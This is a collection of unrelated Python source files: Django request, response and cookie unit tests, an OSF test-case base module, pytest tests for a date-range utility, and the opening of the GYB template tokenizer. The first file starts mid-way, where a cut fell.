self.assertEqual(q['foo'], 'another')
self.assertTrue(q.has_key('foo'))
self.assertTrue('foo' in q)
self.assertEqual(q.items(), [(u'foo', u'another'), (u'name', u'john')])
self.assertEqual(q.lists(), [(u'foo', [u'bar', u'baz', u'another']), (u'name', [u'john'])])
self.assertEqual(q.keys(), [u'foo', u'name'])
self.assertEqual(q.values(), [u'another', u'john'])
self.assertEqual(len(q), 2)
q.update({'foo': 'hello'})
self.assertEqual(q['foo'], 'hello')
self.assertEqual(q.get('foo', 'not available'), 'hello')
self.assertEqual(q.getlist('foo'), [u'bar', u'baz', u'another', u'hello'])
self.assertEqual(q.pop('foo'), [u'bar', u'baz', u'another', u'hello'])
self.assertEqual(q.pop('foo', 'not there'), 'not there')
self.assertEqual(q.get('foo', 'not there'), 'not there')
self.assertEqual(q.setdefault('foo', 'bar'), 'bar')
self.assertEqual(q['foo'], 'bar')
self.assertEqual(q.getlist('foo'), ['bar'])
self.assertEqual(q.urlencode(), 'foo=bar&name=john')
q.clear()
self.assertEqual(len(q), 0)
def test_multiple_keys(self):
"""Test QueryDict with two key/value pairs with same keys."""
q = QueryDict('vote=yes&vote=no')
self.assertEqual(q['vote'], u'no')
self.assertRaises(AttributeError, q.__setitem__, 'something', 'bar')
self.assertEqual(q.get('vote', 'default'), u'no')
self.assertEqual(q.get('foo', 'default'), 'default')
self.assertEqual(q.getlist('vote'), [u'yes', u'no'])
self.assertEqual(q.getlist('foo'), [])
self.assertRaises(AttributeError, q.setlist, 'foo', ['bar', 'baz'])
self.assertRaises(AttributeError, q.setlist, 'foo', ['bar', 'baz'])
self.assertRaises(AttributeError, q.appendlist, 'foo', ['bar'])
self.assertEqual(q.has_key('vote'), True)
self.assertEqual('vote' in q, True)
self.assertEqual(q.has_key('foo'), False)
self.assertEqual('foo' in q, False)
self.assertEqual(q.items(), [(u'vote', u'no')])
self.assertEqual(q.lists(), [(u'vote', [u'yes', u'no'])])
self.assertEqual(q.keys(), [u'vote'])
self.assertEqual(q.values(), [u'no'])
self.assertEqual(len(q), 1)
self.assertRaises(AttributeError, q.update, {'foo': 'bar'})
self.assertRaises(AttributeError, q.pop, 'foo')
self.assertRaises(AttributeError, q.popitem)
self.assertRaises(AttributeError, q.clear)
self.assertRaises(AttributeError, q.setdefault, 'foo', 'bar')
self.assertRaises(AttributeError, q.__delitem__, 'vote')
def test_invalid_input_encoding(self):
"""
QueryDicts must be able to handle invalid input encoding (in this
case, bad UTF-8 encoding).
"""
q = QueryDict('foo=bar&foo=\xff')
self.assertEqual(q['foo'], u'\ufffd')
self.assertEqual(q.getlist('foo'), [u'bar', u'\ufffd'])
def test_pickle(self):
q = QueryDict('')
q1 = pickle.loads(pickle.dumps(q, 2))
self.assertEqual(q == q1, True)
q = QueryDict('a=b&c=d')
q1 = pickle.loads(pickle.dumps(q, 2))
self.assertEqual(q == q1, True)
q = QueryDict('a=b&c=d&a=1')
q1 = pickle.loads(pickle.dumps(q, 2))
self.assertEqual(q == q1 , True)
def test_update_from_querydict(self):
"""Regression test for #8278: QueryDict.update(QueryDict)"""
x = QueryDict("a=1&a=2", mutable=True)
y = QueryDict("a=3&a=4")
x.update(y)
self.assertEqual(x.getlist('a'), [u'1', u'2', u'3', u'4'])
def test_non_default_encoding(self):
"""#13572 - QueryDict with a non-default encoding"""
q = QueryDict('sbb=one', encoding='rot_13')
self.assertEqual(q.encoding , 'rot_13' )
self.assertEqual(q.items() , [(u'foo', u'bar')] )
self.assertEqual(q.urlencode() , 'sbb=one' )
q = q.copy()
self.assertEqual(q.encoding , 'rot_13' )
self.assertEqual(q.items() , [(u'foo', u'bar')] )
self.assertEqual(q.urlencode() , 'sbb=one' )
self.assertEqual(copy.copy(q).encoding , 'rot_13' )
self.assertEqual(copy.deepcopy(q).encoding , 'rot_13')
class HttpResponseTests(unittest.TestCase):
def test_unicode_headers(self):
r = HttpResponse()
# If we insert a unicode value it will be converted to an ascii
r['value'] = u'test value'
self.assertTrue(isinstance(r['value'], str))
# An error is raised when a unicode object with non-ascii is assigned.
self.assertRaises(UnicodeEncodeError, r.__setitem__, 'value', u't\xebst value')
# An error is raised when a unicode object with non-ASCII format is
# passed as initial mimetype or content_type.
self.assertRaises(UnicodeEncodeError, HttpResponse,
content_type=u't\xebst value')
# HttpResponse headers must be convertible to ASCII.
self.assertRaises(UnicodeEncodeError, HttpResponse,
content_type=u't\xebst value')
# The response also converts unicode keys to strings.)
r[u'test'] = 'testing key'
l = list(r.items())
l.sort()
self.assertEqual(l[1], ('test', 'testing key'))
# It will also raise errors for keys with non-ascii data.
self.assertRaises(UnicodeEncodeError, r.__setitem__, u't\xebst key', 'value')
def test_newlines_in_headers(self):
# Bug #10188: Do not allow newlines in headers (CR or LF)
r = HttpResponse()
self.assertRaises(BadHeaderError, r.__setitem__, 'test\rstr', 'test')
self.assertRaises(BadHeaderError, r.__setitem__, 'test\nstr', 'test')
def test_dict_behavior(self):
"""
Test for bug #14020: Make HttpResponse.get work like dict.get
"""
r = HttpResponse()
self.assertEqual(r.get('test'), None)
def test_non_string_content(self):
#Bug 16494: HttpResponse should behave consistently with non-strings
r = HttpResponse(12345)
self.assertEqual(r.content, '12345')
#test content via property
r = HttpResponse()
r.content = 12345
self.assertEqual(r.content, '12345')
def test_iter_content(self):
r = HttpResponse(['abc', 'def', 'ghi'])
self.assertEqual(r.content, 'abcdefghi')
#test iter content via property
r = HttpResponse()
r.content = ['idan', 'alex', 'jacob']
self.assertEqual(r.content, 'idanalexjacob')
r = HttpResponse()
r.content = [1, 2, 3]
self.assertEqual(r.content, '123')
#test retrieval explicitly using iter and odd inputs
r = HttpResponse()
r.content = ['1', u'2', 3, unichr(1950)]
result = []
my_iter = r.__iter__()
while True:
try:
result.append(next(my_iter))
except StopIteration:
break
#'\xde\x9e' == unichr(1950).encode('utf-8')
self.assertEqual(result, ['1', '2', '3', '\xde\x9e'])
self.assertEqual(r.content, '123\xde\x9e')
#with Content-Encoding header
r = HttpResponse([1,1,2,4,8])
r['Content-Encoding'] = 'winning'
self.assertEqual(r.content, '11248')
r.content = [unichr(1950),]
self.assertRaises(UnicodeEncodeError,
getattr, r, 'content')
class CookieTests(unittest.TestCase):
def test_encode(self):
"""
Test that we don't output tricky characters in encoded value
"""
c = SimpleCookie()
c['test'] = "An,awkward;value"
self.assertTrue(";" not in c.output().rstrip(';')) # IE compat
self.assertTrue("," not in c.output().rstrip(';')) # Safari compat
def test_decode(self):
"""
Test that we can still preserve semi-colons and commas
"""
c = SimpleCookie()
c['test'] = "An,awkward;value"
c2 = SimpleCookie()
c2.load(c.output())
self.assertEqual(c['test'].value, c2['test'].value)
def test_decode_2(self):
"""
Test that we haven't broken normal encoding
"""
c = SimpleCookie()
c['test'] = "\xf0"
c2 = SimpleCookie()
c2.load(c.output())
self.assertEqual(c['test'].value, c2['test'].value)
def test_nonstandard_keys(self):
"""
Test that a single non-standard cookie name doesn't affect all cookies. Ticket #13007.
"""
self.assertTrue('good_cookie' in parse_cookie('good_cookie=yes;bad:cookie=yes').keys())
def test_repeated_nonstandard_keys(self):
"""
Test that a repeated non-standard name doesn't affect all cookies. Ticket #15852
"""
self.assertTrue('good_cookie' in parse_cookie('a,=b; a,=c; good_cookie=yes').keys())
def test_httponly_after_load(self):
"""
Test that we can use httponly attribute on cookies that we load
"""
c = SimpleCookie()
c.load("name=val")
c['name']['httponly'] = True
self.assertTrue(c['name']['httponly'])
| |
# -*- coding: utf-8 -*-
'''Base TestCase class for OSF unittests. Uses a temporary MongoDB database.'''
import abc
import datetime as dt
import functools
import logging
import re
import unittest
import uuid
import blinker
import httpretty
import mock
import pytest
from django.test.utils import override_settings
from django.test import TestCase as DjangoTestCase
from faker import Factory
from framework.auth.core import Auth
from framework.celery_tasks.handlers import celery_before_request
from framework.django.handlers import handlers as django_handlers
from framework.flask import rm_handlers
from osf.models import MetaSchema
from website import settings
from website.app import init_app
from website.notifications.listeners import (subscribe_contributor,
subscribe_creator)
from website.project.model import ensure_schemas
from website.project.signals import contributor_added, project_created
from website.project.views.contributor import notify_added_contributor
from website.signals import ALL_SIGNALS
from webtest_plus import TestApp
from .json_api_test_app import JSONAPITestApp
from nose.tools import * # noqa (PEP8 asserts); noqa (PEP8 asserts)
logger = logging.getLogger(__name__)
def get_default_metaschema():
"""This needs to be a method so it gets called after the test database is set up"""
try:
return MetaSchema.find()[0]
except IndexError:
ensure_schemas()
return MetaSchema.find()[0]
try:
test_app = init_app(routes=True, set_backends=False)
except AssertionError: # Routes have already been set up
test_app = init_app(routes=False, set_backends=False)
rm_handlers(test_app, django_handlers)
test_app.testing = True
# Silence some 3rd-party logging and some "loud" internal loggers
SILENT_LOGGERS = [
'api.caching.tasks',
'factory.generate',
'factory.containers',
'framework.analytics',
'framework.auth.core',
'framework.celery_tasks.signals',
'website.app',
'website.archiver.tasks',
'website.mails',
'website.notifications.listeners',
'website.search.elastic_search',
'website.search_migration.migrate',
'website.util.paths',
'requests_oauthlib.oauth2_session',
'raven.base.Client',
'raven.contrib.django.client.DjangoClient',
]
for logger_name in SILENT_LOGGERS:
logging.getLogger(logger_name).setLevel(logging.CRITICAL)
# Fake factory
fake = Factory.create()
@pytest.mark.django_db
class DbTestCase(unittest.TestCase):
"""Base `TestCase` for tests that require a scratch database.
"""
@classmethod
def setUpClass(cls):
super(DbTestCase, cls).setUpClass()
cls._original_enable_email_subscriptions = settings.ENABLE_EMAIL_SUBSCRIPTIONS
settings.ENABLE_EMAIL_SUBSCRIPTIONS = False
cls._original_bcrypt_log_rounds = settings.BCRYPT_LOG_ROUNDS
settings.BCRYPT_LOG_ROUNDS = 4
@classmethod
def tearDownClass(cls):
super(DbTestCase, cls).tearDownClass()
settings.ENABLE_EMAIL_SUBSCRIPTIONS = cls._original_enable_email_subscriptions
settings.BCRYPT_LOG_ROUNDS = cls._original_bcrypt_log_rounds
class AppTestCase(unittest.TestCase):
"""Base `TestCase` for OSF tests that require the WSGI app (but no database).
"""
PUSH_CONTEXT = True
DISCONNECTED_SIGNALS = {
# disconnect notify_add_contributor so that add_contributor does not send "fake" emails in tests
contributor_added: [notify_added_contributor]
}
def setUp(self):
super(AppTestCase, self).setUp()
self.app = TestApp(test_app)
if not self.PUSH_CONTEXT:
return
self.context = test_app.test_request_context(headers={
'Remote-Addr': '146.9.219.56',
'User-Agent': 'Mozilla/5.0 (X11; U; SunOS sun4u; en-US; rv:0.9.4.1) Gecko/20020518 Netscape6/6.2.3'
})
self.context.push()
with self.context:
celery_before_request()
for signal in self.DISCONNECTED_SIGNALS:
for receiver in self.DISCONNECTED_SIGNALS[signal]:
signal.disconnect(receiver)
def tearDown(self):
super(AppTestCase, self).tearDown()
if not self.PUSH_CONTEXT:
return
with mock.patch('website.mailchimp_utils.get_mailchimp_api'):
self.context.pop()
for signal in self.DISCONNECTED_SIGNALS:
for receiver in self.DISCONNECTED_SIGNALS[signal]:
signal.connect(receiver)
class ApiAppTestCase(unittest.TestCase):
"""Base `TestCase` for OSF API v2 tests that require the WSGI app (but no database).
"""
allow_database_queries = True
def setUp(self):
super(ApiAppTestCase, self).setUp()
self.app = JSONAPITestApp()
class SearchTestCase(unittest.TestCase):
def setUp(self):
settings.ELASTIC_INDEX = uuid.uuid4().hex
settings.ELASTIC_TIMEOUT = 60
from website.search import elastic_search
elastic_search.INDEX = settings.ELASTIC_INDEX
elastic_search.create_index(settings.ELASTIC_INDEX)
# NOTE: Super is called last to ensure the ES connection can be established before
# the httpretty module patches the socket.
super(SearchTestCase, self).setUp()
def tearDown(self):
super(SearchTestCase, self).tearDown()
from website.search import elastic_search
elastic_search.delete_index(settings.ELASTIC_INDEX)
methods = [
httpretty.GET,
httpretty.PUT,
httpretty.HEAD,
httpretty.POST,
httpretty.PATCH,
httpretty.DELETE,
]
def kill(*args, **kwargs):
logger.error('httppretty.kill: %s - %s', args, kwargs)
raise httpretty.errors.UnmockedError()
class MockRequestTestCase(unittest.TestCase):
DISABLE_OUTGOING_CONNECTIONS = False
def setUp(self):
super(MockRequestTestCase, self).setUp()
if self.DISABLE_OUTGOING_CONNECTIONS:
httpretty.enable()
for method in methods:
httpretty.register_uri(
method,
re.compile(r'.*'),
body=kill,
priority=-1,
)
def tearDown(self):
super(MockRequestTestCase, self).tearDown()
httpretty.reset()
httpretty.disable()
class OsfTestCase(DbTestCase, AppTestCase, SearchTestCase, MockRequestTestCase):
"""Base `TestCase` for tests that require both scratch databases and the OSF
application. Note: superclasses must call `super` in order for all setup and
teardown methods to be called correctly.
"""
pass
class ApiTestCase(DbTestCase, ApiAppTestCase, SearchTestCase, MockRequestTestCase):
"""Base `TestCase` for tests that require both scratch databases and the OSF
API application. Note: superclasses must call `super` in order for all setup and
teardown methods to be called correctly.
"""
def setUp(self):
super(ApiTestCase, self).setUp()
settings.USE_EMAIL = False
class ApiAddonTestCase(ApiTestCase):
"""Base `TestCase` for tests that require interaction with addons.
"""
DISABLE_OUTGOING_CONNECTIONS = True
@abc.abstractproperty
def short_name(self):
pass
@abc.abstractproperty
def addon_type(self):
pass
@abc.abstractmethod
def _apply_auth_configuration(self):
pass
@abc.abstractmethod
def _set_urls(self):
pass
def _settings_kwargs(self, node, user_settings):
return {
'user_settings': self.user_settings,
'folder_id': '1234567890',
'owner': self.node
}
def setUp(self):
super(ApiAddonTestCase, self).setUp()
from osf_tests.factories import (
ProjectFactory,
AuthUserFactory,
)
from addons.base.models import (
BaseOAuthNodeSettings,
BaseOAuthUserSettings
)
assert self.addon_type in ('CONFIGURABLE', 'OAUTH', 'UNMANAGEABLE', 'INVALID')
self.account = None
self.node_settings = None
self.user_settings = None
self.user = AuthUserFactory()
self.auth = Auth(self.user)
self.node = ProjectFactory(creator=self.user)
if self.addon_type not in ('UNMANAGEABLE', 'INVALID'):
if self.addon_type in ('OAUTH', 'CONFIGURABLE'):
self.account = self.AccountFactory()
self.user.external_accounts.add(self.account)
self.user.save()
self.user_settings = self.user.get_or_add_addon(self.short_name)
self.node_settings = self.node.get_or_add_addon(self.short_name, auth=self.auth)
if self.addon_type in ('OAUTH', 'CONFIGURABLE'):
self.node_settings.set_auth(self.account, self.user)
self._apply_auth_configuration()
if self.addon_type in ('OAUTH', 'CONFIGURABLE'):
assert isinstance(self.node_settings, BaseOAuthNodeSettings)
assert isinstance(self.user_settings, BaseOAuthUserSettings)
self.node_settings.reload()
self.user_settings.reload()
self.account_id = self.account._id if self.account else None
self.set_urls()
def tearDown(self):
super(ApiAddonTestCase, self).tearDown()
self.user.remove()
self.node.remove()
if self.node_settings:
self.node_settings.remove()
if self.user_settings:
self.user_settings.remove()
if self.account:
self.account.remove()
@override_settings(ROOT_URLCONF='admin.base.urls')
class AdminTestCase(DbTestCase, DjangoTestCase, SearchTestCase, MockRequestTestCase):
pass
class NotificationTestCase(OsfTestCase):
"""An `OsfTestCase` to use when testing specific subscription behavior.
Use when you'd like to manually create all Node subscriptions and subscriptions
for added contributors yourself, and not rely on automatically added ones.
"""
DISCONNECTED_SIGNALS = {
# disconnect signals so that add_contributor does not send "fake" emails in tests
contributor_added: [notify_added_contributor, subscribe_contributor],
project_created: [subscribe_creator]
}
def setUp(self):
super(NotificationTestCase, self).setUp()
def tearDown(self):
super(NotificationTestCase, self).tearDown()
class ApiWikiTestCase(ApiTestCase):
def setUp(self):
from osf_tests.factories import AuthUserFactory
super(ApiWikiTestCase, self).setUp()
self.user = AuthUserFactory()
self.non_contributor = AuthUserFactory()
def _add_project_wiki_page(self, node, user):
from addons.wiki.tests.factories import NodeWikiFactory
# API will only return current wiki pages
# Mock out update_search. TODO: Remove when StoredFileNode is implemented
with mock.patch('osf.models.AbstractNode.update_search'):
return NodeWikiFactory(node=node, user=user)
# From Flask-Security: https://github.com/mattupstate/flask-security/blob/develop/flask_security/utils.py
class CaptureSignals(object):
"""Testing utility for capturing blinker signals.
Context manager which mocks out selected signals and registers which
are `sent` on and what arguments were sent. Instantiate with a list of
blinker `NamedSignals` to patch. Each signal has its `send` mocked out.
"""
def __init__(self, signals):
"""Patch all given signals and make them available as attributes.
:param signals: list of signals
"""
self._records = {}
self._receivers = {}
for signal in signals:
self._records[signal] = []
self._receivers[signal] = functools.partial(self._record, signal)
def __getitem__(self, signal):
"""All captured signals are available via `ctxt[signal]`.
"""
if isinstance(signal, blinker.base.NamedSignal):
return self._records[signal]
else:
super(CaptureSignals, self).__setitem__(signal)
def _record(self, signal, *args, **kwargs):
self._records[signal].append((args, kwargs))
def __enter__(self):
for signal, receiver in self._receivers.items():
signal.connect(receiver)
return self
def __exit__(self, type, value, traceback):
for signal, receiver in self._receivers.items():
signal.disconnect(receiver)
def signals_sent(self):
"""Return a set of the signals sent.
:rtype: list of blinker `NamedSignals`.
"""
return set([signal for signal, _ in self._records.items() if self._records[signal]])
def capture_signals():
"""Factory method that creates a ``CaptureSignals`` with all OSF signals."""
return CaptureSignals(ALL_SIGNALS)
def assert_dict_contains_subset(a, b):
assert set(a.items()).issubset(set(b.items()))
def assert_is_redirect(response, msg='Response is a redirect.'):
assert 300 <= response.status_code < 400, msg
def assert_before(lst, item1, item2):
"""Assert that item1 appears before item2 in lst."""
assert_less(lst.index(item1), lst.index(item2),
'{0!r} appears before {1!r}'.format(item1, item2))
def assert_datetime_equal(dt1, dt2, allowance=500):
"""Assert that two datetimes are about equal."""
assert abs(dt1 - dt2) < dt.timedelta(milliseconds=allowance)
| |
from datetime import datetime as dt, date as d, time as t, timedelta as td
import pytest
from gfit2mfp.utils import DateRange
def test_create_date_range():
obj = DateRange(1, 2)
assert obj.start == 1
assert obj.end == 2
@pytest.mark.parametrize(
'start, end, other_start, other_end',
# just use ints in this test because writing datetimes is hard work
[
# the other date range starts after, ends after
(2, 4, 3, 5),
# starts before, ends before
(2, 4, 1, 3),
# starts before, ends after
(2, 4, 1, 5),
# starts before, ends the exact same time as this one starts
(2, 4, 1, 2),
# starts exactly when this one ends, ends after
(2, 4, 4, 5)
]
)
def test_date_ranges_intersect(start, end, other_start, other_end):
obj = DateRange(start, end)
other = DateRange(other_start, other_end)
assert other in obj
@pytest.mark.parametrize(
'start, end, other_start, other_end',
[
# other range starts after
(2, 4, 5, 6),
# other range ends before
(2, 4, 0, 1)
]
)
def test_date_ranges_dont_intersect(start, end, other_start, other_end):
obj = DateRange(start, end)
other = DateRange(other_start, other_end)
assert other not in obj
@pytest.mark.parametrize(
'start, end, other',
[
# date is exactly equal to start
(dt(2000, 1, 5), dt(2000, 1, 10), dt(2000, 1, 5)),
# date is in the middle
(dt(2000, 1, 5), dt(2000, 1, 10), dt(2000, 1, 7)),
# date is exactly equal to end
(dt(2000, 1, 5), dt(2000, 1, 10), dt(2000, 1, 10)),
]
)
def test_date_ranges_contains_date(start, end, other):
obj = DateRange(start, end)
assert other in obj
assert obj.near(other)
@pytest.mark.parametrize(
'start, end, other',
[
# date is before
(dt(2000, 1, 5), dt(2000, 1, 10), dt(2000, 1, 1)),
# date is after
(dt(2000, 1, 5), dt(2000, 1, 10), dt(2000, 1, 12))
]
)
def test_date_ranges_not_contains_date(start, end, other):
obj = DateRange(start, end)
assert other not in obj
def test_date_ranges_equal():
obj = DateRange(dt(2000, 1, 5), dt(2000, 1, 10))
other = DateRange(dt(2000, 1, 5), dt(2000, 1, 10))
assert obj == other
def test_hash_is_consistent():
obj = DateRange(dt(2000, 1, 5), dt(2000, 1, 10))
other = DateRange(dt(2000, 1, 5), dt(2000, 1, 10))
assert hash(obj) == hash(other)
@pytest.mark.parametrize(
'start, end, other_start, other_end',
[
# the other date range just clips the start
(t(12, 10, 0), t(13, 10, 0), t(12, 0, 0), t(12, 5, 0)),
# the other date range just clips the end
(t(12, 10, 0), t(13, 10, 0), t(13, 15, 0), t(13, 20, 0)),
]
)
def test_date_ranges_near(start, end, other_start, other_end):
date = d(2000, 1, 5)
obj = DateRange(dt.combine(date, start), dt.combine(date, end))
other = DateRange(dt.combine(date, other_start), dt.combine(date, other_end))
obj.near_time = td(seconds=300)
assert obj.near(other)
@pytest.mark.parametrize(
'start, end, other_start, other_end',
[
# the other date range just misses the start
(t(12, 10, 0), t(13, 10, 0), t(12, 0, 0), t(12, 4, 59)),
# the other date range just misses the end
(t(12, 10, 0), t(13, 10, 0), t(13, 15, 1), t(13, 20, 0))
]
)
def test_date_ranges_arent_near(start, end, other_start, other_end):
date = d(2000, 1, 5)
obj = DateRange(dt.combine(date, start), dt.combine(date, end))
other = DateRange(dt.combine(date, other_start), dt.combine(date, other_end))
obj.near_time = td(seconds=300)
assert not obj.near(other)
@pytest.mark.parametrize(
'start, end, other',
[
# the other date range just clips the start
(t(12, 10, 0), t(13, 10, 0), t(12, 5, 0)),
# the other date range just clips the end
(t(12, 10, 0), t(13, 10, 0), t(13, 15, 0))
]
)
def test_date_ranges_near_date(start, end, other):
date = d(2000, 1, 5)
obj = DateRange(dt.combine(date, start), dt.combine(date, end))
obj.near_time = td(seconds=300)
assert obj.near(dt.combine(date, other))
@pytest.mark.parametrize(
'start, end, other',
[
# the other date range just misses the start
(t(12, 10, 0), t(13, 10, 0), t(12, 4, 59)),
# the other date range just misses the end
(t(12, 10, 0), t(13, 10, 0), t(13, 15, 1)),
]
)
def test_date_ranges_not_near_date(start, end, other):
date = d(2000, 1, 5)
obj = DateRange(dt.combine(date, start), dt.combine(date, end))
obj.near_time = td(seconds=300)
assert not obj.near(dt.combine(date, other))
@pytest.mark.parametrize('val', [d.today(), t(0), 1, '', None])
def test_near_bad_val(val):
with pytest.raises(NotImplementedError):
DateRange(dt(2000, 1, 1), dt(2000, 1, 2)).near(val)
@pytest.mark.parametrize('left, right, less_than',
[
# same start, same end
(DateRange(2, 4), DateRange(2, 4), False),
# same start, l ends before r
(DateRange(2, 4), DateRange(2, 5), True),
# same start, l ends after r
(DateRange(2, 4), DateRange(2, 3), False),
# l starts before r, same end
(DateRange(1, 4), DateRange(2, 4), True),
# l starts before r, l ends after r
(DateRange(1, 5), DateRange(2, 4), True),
# l starts before r, l ends before r
(DateRange(1, 3), DateRange(2, 4), True),
# l starts after r, same end
(DateRange(3, 4), DateRange(2, 4), False),
# l starts after r, l ends after r
(DateRange(3, 5), DateRange(2, 4), False),
# l starts after r, l ends before r
(DateRange(3, 4), DateRange(2, 5), False),
]
)
def test_lt(left, right, less_than):
assert (left < right) == less_than
@pytest.mark.parametrize('left, right, new',
[
# equal makes equal
(DateRange(1, 2), DateRange(1, 2), DateRange(1, 2)),
# no intersect
(DateRange(1, 2), DateRange(4, 5), DateRange(1, 5)),
(DateRange(4, 5), DateRange(1, 2), DateRange(1, 5)),
# part-overlap
(DateRange(1, 3), DateRange(2, 4), DateRange(1, 4)),
(DateRange(2, 4), DateRange(1, 3), DateRange(1, 4)),
]
)
def test_combine(left, right, new):
assert left.combine(right) == new
def test_duration():
assert DateRange(4, 6).duration == 2
| |
#!/usr/bin/env python
# GYB: Generate Your Boilerplate (improved names welcome; at least
# this one's short). See -h output for instructions
from __future__ import print_function
import os
import re
import sys
try:
from cStringIO import StringIO
except ImportError:
from io import StringIO
import textwrap
import tokenize
from bisect import bisect
try:
basestring
except NameError:
basestring = str
def get_line_starts(s):
"""Return a list containing the start index of each line in s.
The list also contains a sentinel index for the end of the string,
so there will be one more element in the list than there are lines
in the string
"""
starts = [0]
for line in s.split('\n'):
starts.append(starts[-1] + len(line) + 1)
starts[-1] -= 1
return starts
def strip_trailing_nl(s):
"""If s ends with a newline, drop it; else return s intact"""
return s[:-1] if s.endswith('\n') else s
def split_lines(s):
"""Split s into a list of lines, each of which has a trailing newline
If the lines are later concatenated, the result is s, possibly
with a single appended newline.
"""
return [l + '\n' for l in s.split('\n')]
# text on a line up to the first '$$', '${', or '%%'
literalText = r'(?: [^$\n%] | \$(?![${]) | %(?!%) )*'
# The part of an '%end' line that follows the '%' sign
linesClose = r'[\ \t]* end [\ \t]* (?: \# .* )? $'
# Note: Where "# Absorb" appears below, the regexp attempts to eat up
# through the end of ${...} and %{...}% constructs. In reality we
# handle this with the Python tokenizer, which avoids mis-detections
# due to nesting, comments and strings. This extra absorption in the
# regexp facilitates testing the regexp on its own, by preventing the
# interior of some of these constructs from being treated as literal
# text.
tokenize_re = re.compile(
r'''
# %-lines and %{...}-blocks
# \n? # absorb one preceding newline
^
(?:
(?P<gybLines>
(?P<_indent> [\ \t]* % (?! [{%] ) [\ \t]* ) (?! [\ \t] | ''' +
linesClose + r''' ) .*
( \n (?P=_indent) (?! ''' + linesClose + r''' ) .* ) *
)
| (?P<gybLinesClose> [\ \t]* % [ \t]* ''' + linesClose + r''' )
| [\ \t]* (?P<gybBlockOpen> %\{ )
(?: [^}]| \} (?!%) )* \}% # Absorb
)
\n? # absorb one trailing newline
# Substitutions
| (?P<substitutionOpen> \$\{ )
[^}]* \} # Absorb
# %% and $$ are literal % and $ respectively
| (?P<symbol>[$%]) (?P=symbol)
# Literal text
| (?P<literal> ''' + literalText + r'''
(?:
# newline that doesn't precede space+%
(?: \n (?! [\ \t]* %[^%] ) )
''' + literalText + r'''
)*
\n?
)
''', re.VERBOSE | re.MULTILINE)
gyb_block_close = re.compile('\}%[ \t]*\n?')
def token_pos_to_index(token_pos, start, line_starts):
"""Translate a tokenize (line, column) pair into an absolute
position in source text given the position where we started
tokenizing and a list that maps lines onto their starting
character indexes.
"""
relative_token_line_plus1, token_col = token_pos
# line number where we started tokenizing
start_line_num = bisect(line_starts, start) - 1
# line number of the token in the whole text
abs_token_line = relative_token_line_plus1 - 1 + start_line_num
# if found in the first line, adjust the end column to account
# for the extra text
if relative_token_line_plus1 == 1:
token_col += start - line_starts[start_line_num]
# Sometimes tokenizer errors report a line beyond the last one
if abs_token_line >= len(line_starts):
return line_starts[-1]
return line_starts[abs_token_line] + token_col
def tokenize_python_to_unmatched_close_curly(source_text, start, line_starts):
"""Apply Python's tokenize to source_text starting at index start
while matching open and close curly braces. When an unmatched
close curly brace is found, return its index. If not found,
return len(source_text). If there's a tokenization error, return
the position of the error.
"""
stream = StringIO(source_text)
stream.seek(start)
nesting = 0
try:
for kind, text, token_start, token_end, line_text \
in tokenize.generate_tokens(stream.readline):
if text == '{':
nesting += 1
elif text == '}':
nesting -= 1
if nesting < 0:
return token_pos_to_index(token_start, start, line_starts)
except tokenize.TokenError as error:
(message, error_pos) = error.args
return token_pos_to_index(error_pos, start, line_starts)
return len(source_text)
def tokenize_template(template_text):
r"""Given the text of a template, returns an iterator over
(tokenType, token, match) tuples.
**Note**: this is template syntax tokenization, not Python
tokenization.
When a non-literal token is matched, a client may call
iter.send(pos) on the iterator to reset the position in
template_text at which scanning will resume.
This function provides a base level of tokenization which is
then refined by ParseContext.token_generator.
>>> from pprint import *
>>> pprint(list((kind, text) for kind, text, _ in tokenize_template(
... '%for x in range(10):\n% print x\n%end\njuicebox')))
[('gybLines', '%for x in range(10):\n% print x'),
('gybLinesClose', '%end'),
('literal', 'juicebox')]
>>> pprint(list((kind, text) for kind, text, _ in tokenize_template(
... '''Nothing
... % if x:
... % for i in range(3):
... ${i}
... % end
... % else:
... THIS SHOULD NOT APPEAR IN THE OUTPUT
... ''')))
[('literal', 'Nothing\n'),
('gybLines', '% if x:\n% for i in range(3):'),
('substitutionOpen', '${'),
('literal', '\n'),
('gybLinesClose', '% end'),
('gybLines', '% else:'),
('literal', 'THIS SHOULD NOT APPEAR IN THE OUTPUT\n')]
>>> for kind, text, _ in tokenize_template('''
... This is $some$ literal stuff containing a ${substitution}
... followed by a %{...} block:
... %{
... # Python code
... }%
... and here $${are} some %-lines:
... % x = 1
... % y = 2
... % if z == 3:
... % print '${hello}'
... % end
... % for x in zz:
... % print x
... % # different indentation
... % twice
... and some lines that literally start with a %% token
... %% first line
... %% second line
... '''):
... print((kind, text.strip().split('\n',1)[0]))
('literal', 'This is $some$ literal stuff containing a')
('substitutionOpen', '${')
('literal', 'followed by a %{...} block:')
('gybBlockOpen', '%{')
('literal', 'and here ${are} some %-lines:')
('gybLines', '% x = 1')
('gybLinesClose', '% end')
('gybLines', '% for x in zz:')
('gybLines', '% # different indentation')
('gybLines', '% twice')
('literal', 'and some lines that literally start with a % token')
"""
pos = 0
end = len(template_text)
saved_literal = []
literal_first_match = None
while pos < end:
m = tokenize_re.match(template_text, pos, end)
# pull out the one matched key (ignoring internal patterns starting
# with _)
((kind, text), ) = (
(kind, text) for (kind, text) in m.groupdict().items()
if text is not None and kind[0] != '_')
if kind in ('literal', 'symbol'):
if len(saved_literal) == 0:
literal_first_match = m
# literals and symbols get batched together
saved_literal.append(text)
pos = None
else:
# found a non-literal. First yield any literal we've accumulated
if saved_literal != []:
yield 'literal', ''.join(saved_literal), literal_first_match
saved_literal = []
# Then yield the thing we found. If we get a reply, it's
# the place to resume tokenizing
pos = yield kind, text, m
# If we were not sent a new position by our client, resume
# tokenizing at the end of this match.
if pos is None:
pos = m.end(0)
else:
# Client is not yet ready to process next token
yield
if saved_literal != []:
yield 'literal', ''.join(saved_literal), literal_first_match
def split_gyb_lines(source_lines):
r"""Return a list of lines at which to split the incoming source
These positions represent the beginnings of python line groups that
will require a matching %end construct if they are to be closed.
>>> src = split_lines('''\
... if x:
... print x
... if y: # trailing comment
... print z
... if z: # another comment\
... ''')
>>> s = split_gyb_lines(src)
>>> len(s)
2
>>> src[s[0]]
' print z\n'
>>> s[1] - len(src)
0
>>> src = split_lines('''\
... if x:
... if y: print 1
... if z:
... print 2
... pass\
... ''')
>>> s = split_gyb_lines(src)
>>> len(s)
1
>>> src[s[0]]
' if y: print 1\n'
>>> src = split_lines('''\
... if x:
... if y:
... print 1
... print 2
... ''')
>>> s = split_gyb_lines(src)
>>> len(s)
2
>>> src[s[0]]
' if y:\n'
>>> src[s[1]]
' print 1\n'
"""
